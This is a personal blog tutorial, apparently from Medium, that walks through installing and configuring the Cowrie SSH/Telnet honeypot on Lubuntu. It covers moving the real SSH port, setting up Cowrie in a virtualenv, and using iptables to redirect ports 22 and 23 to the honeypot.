Install And Setup Cowrie Honeypot On Ubuntu(Linux)

jeremie daniel
Mar 29 · 5 min read

I am using Lubuntu as OS and this blog is to define and install cowrie.

What is Cowrie?

It is mostly used to records the sessions of an attacker, then with cowrie we get a better comprehension on the details of the attacker such as the attacker tools, methods and procedures. Cowrie is a simulation of your server that means that the attacker will think that they have hacked/attacked your server. So when a attacker inputs the right data(username or password) to log into your system, the system will let them in without any error and they’ve put themselves into a fake system. The honeypot keeps the records and tracks of the attacker such as their commands, or every keys typed in and saves everything the attacker downloaded. This is a genius way to capture an attacker.

The hosts SSH daemon will run on a high port which is 22222, Cowrie on 2222 and port 22 will be redirected to 2222 using iptables( I have a blog about iptables if you want a better understanding). Then the SSH bot or attacker will connect to port 22 which is redirected to our honeypot on port 2222.

Requirements and procedures to install cowrie :

Change the Default port 22 to port 22222 :

We are changing the port 22 (Default SSH port) so that the bot or attacker thinks they are in a real SSH port. This is a type of defense when moving the SSH port on your servers. Honeypot will make port 2222 act like the real one.

First type in this command to change the port :


sudo code /etc/ssh/sshd_config --user-data-dir /home/[home folder]/
vscode is my editor that's why i wrote code, you can use your own editor

This will open the sshd_config file :

On the line 13 such as above, I deleted the “#port 22” and replaced it with Port 22222.

Now type in :

systemctl restart ssh
systemctl status ssh

We restart SSH so that to see if it listen to the new configured port.

It is listening to port 2222

To see if we are really listening to port 22222 type in :

ssh [your-username]@localhost -p 22222

Now we Install Cowrie Honeypot On Ubuntu/Lubuntu

First we need to update the system :

sudo apt update

Then we install all the dependencies of Cowrie :

sudo apt-get install git python-virtualenv libssl-dev build-essential libpython-dev python2.7-minimal authbind

Then we need to add a user Cowrie :

sudo adduser --disabled-password cowrie

By mistake i had cancelled it but if you run this command you should be getting :

Adding user `cowrie' ...
Adding new group `cowrie' (1000) ...
Adding new user `cowrie' (1000) with group `cowrie' ...
Creating home directory `/home/cowrie' ...
Copying files from `/etc/skel' ...
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] Y

You can leave Full Name, etc.. blank.

Now lets run as cowrie :

su -cowrie

For the password if you let it blank just press enter else put your password.
Then to verify your id just type in :

id

Now lets download the code for Cowrie :

git clone http://github.com/micheloosterhof/cowrie

Now we need to create a virtual environment for Python and Cowrie to run from and activate it:

cd cowrie/
virtualenv cowrie-env
source cowrie-env/bin/activate

Then we need to install the packages of Python that Cowrie needs to run :

pip install --upgrade pip
pip install --upgrade -r requirements.txt

Now we need to configure the Cowrie daemon :

cd etc/               
cp cowrie.cfg.dist cowrie.cfg

This command creates a config file that we can edit then use an editor to edit this file :

nano cowrie.cfg

After that, we will edit this file by changing the hostname first as this will make the attacker think that it is in our server without us knowing :

Change the hostname from svr04 to testserver5 same as below :

Then we need to enable telnet :

In this file (cowrie.cfg) there are many options to play with, from logging and alerting to fake address and file downloads.

Finally we are ready to start daemon :

From the netstat, we can see the SSH and Telnet daemon of our honeypot listening on port 2222 and 2223 respectively.

Then we need to redirect traffic of port 22 and 23 to the high ports 2222 and 2223 using iptables :

iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222                                          
iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223

To scan the ports and to scan what is happening in the honeypot type in :

tail -f log/cowrie.log

To watch the logs of your honeypot write :

cat cowrie.log

From now on you can scan the logs and running commands within your honeypot.

Thank you for reading my blog
If any suggestions , tell me.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade